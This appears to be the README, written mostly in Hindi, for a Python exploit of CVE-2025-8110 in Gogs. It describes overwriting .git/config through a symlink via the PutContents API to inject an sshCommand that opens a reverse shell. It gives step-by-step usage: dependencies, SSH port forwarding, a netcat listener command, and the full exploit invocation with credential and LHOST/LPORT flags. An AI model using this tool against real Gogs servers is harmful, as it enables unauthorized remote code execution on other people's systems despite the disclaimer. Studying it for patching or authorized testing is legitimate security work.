
Gogs CVE-2025-8110 RCE Exploit
Gogs में CVE-2025-8110 के लिए एक स्वचालित Python शोषण। यह कमजोरी PutContents API का दुरुपयोग करके दूरस्थ कोड निष्पादन (RCE) की अनुमति देती है, जो यह सत्यापित करने में विफल रहता है कि कोई फ़ाइल पथ सिमलिंक है या नहीं। सिमलिंक के माध्यम से आंतरिक .git/config फ़ाइल को अधिलेखित करके, हम रिवर्स शेल को ट्रिगर करने के लिए एक दुर्भावनापूर्ण sshCommand इंजेक्ट कर सकते हैं।
सुनिश्चित करें कि आपके पास Python 3 और आवश्यक निर्भरताएँ स्थापित हैं:
pip install requests rich beautifulsoup4
आपके पास git स्थापित होना चाहिए और रिपॉजिटरी क्लोनिंग और कमिटिंग चरण के लिए आपके $PATH में उपलब्ध होना चाहिए।
Gogs 127.0.0.1:3001 पर बंधा हो सकता है। WebUI तक स्थानीय रूप से पहुँचने के लिए पोर्ट फ़ॉरवर्डिंग का उपयोग करें:
ssh -L 3001:127.0.0.1:3001 user@target-ip
एक बार फ़ॉरवर्ड करने के बाद, http://localhost:3001 पर जाएँ:
स्क्रिप्ट पेलोड वितरित करने के लिए Gogs API का उपयोग करती है:
स्क्रिप्ट चलाने से पहले अपना लिसनर प्रारंभ करें, क्योंकि API अपडेट संसाधित होते ही शेल ट्रिगर हो जाता है।
nc -lvnp 5555
अपनी साख और टोकन को तर्क के रूप में पास करें:
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555
| Flag | विवरण |
|---|---|
-u | Gogs इंस्टेंस का बेस URL (जैसे, http://localhost:3001)। |
-un | आपके द्वारा बनाए गए खाते का उपयोगकर्ता नाम। |
-pw | आपके द्वारा बनाए गए खाते का पासवर्ड। |
-t | सेटिंग्स में जनरेट किया गया API टोकन। |
-lh | आपके लिसनर का IP पता (LHOST)। |
-lp | आपके लिसनर का पोर्ट (LPORT)। |
नोट: यदि स्क्रिप्ट हैंग हो जाती है या "Overwriting .git/config" के बाद
Read timed outलौटाती है, तो अपना लिसनर जाँचें। यह आमतौर पर इंगित करता है कि रिवर्स शेल सफलतापूर्वक कनेक्ट हो गया है और कनेक्शन को होल्ड कर रहा है।
लेखक: TYehan
अस्वीकरण: यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा ऑडिटिंग के लिए है। जिम्मेदारी से उपयोग करें।